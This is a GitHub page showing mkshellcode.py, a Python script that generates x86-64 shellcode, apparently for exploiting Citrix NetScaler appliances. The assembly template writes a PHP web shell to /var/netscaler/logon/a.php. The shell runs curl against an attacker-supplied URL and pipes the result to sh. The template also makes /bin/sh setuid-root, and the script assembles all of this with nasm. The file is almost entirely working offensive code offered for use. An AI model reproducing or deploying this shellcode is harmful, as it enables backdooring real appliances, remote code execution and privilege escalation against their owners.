-
Notifications
You must be signed in to change notification settings - Fork 1
/
mkshellcode.py
55 lines (48 loc) · 1.13 KB
/
mkshellcode.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import os, tempfile
template="""bits 64
; fd=open("/var/netscaler/logon/a.php", O_WRONLY|O_TRUNC|O_CREAT, 0777);
lea rdi, [rel path1]
xor eax, eax
xor edx, edx
mov al, 5 ; sys_open
xor esi, esi
mov si, 0x0601 ; O_WRONLY|O_TRUNC|O_CREAT
mov dx, 0x1ff ; 0777
syscall
; write(fd, shell, strlen(shell));
push rax
pop rdi
push 4
pop rax ; sys_write
lea rsi, [rel cmd]
xor edx, edx
mov dl, path1-cmd
syscall
; chmod("/bin/sh", 6555);
mov al, 15 ; sys_chmod
lea rdi, [rel path2]
xor esi, esi
mov si, 0xd6d ; 06555
syscall
; avoid crashing
push {}
ret
; constants
cmd:
db "<?=`curl {}|sh`;"
path1:
db "/var/netscaler/logon/a.php", 0
path2:
db "/bin/sh", 0
"""
def mkshellcode(fixup, payload_url):
"""
fixup: hex string starting with 0x, pointing to the address to jump to after shellcode runs
payload_url: location of the payload on an http server
"""
asm=template.format(fixup, payload_url)
with tempfile.TemporaryDirectory() as tmpd:
open(tmpd+"/shellcode.S","w").write(asm)
os.system("nasm "+tmpd+"/shellcode.S")
shellcode=open(tmpd+"/shellcode","rb").read()
return shellcode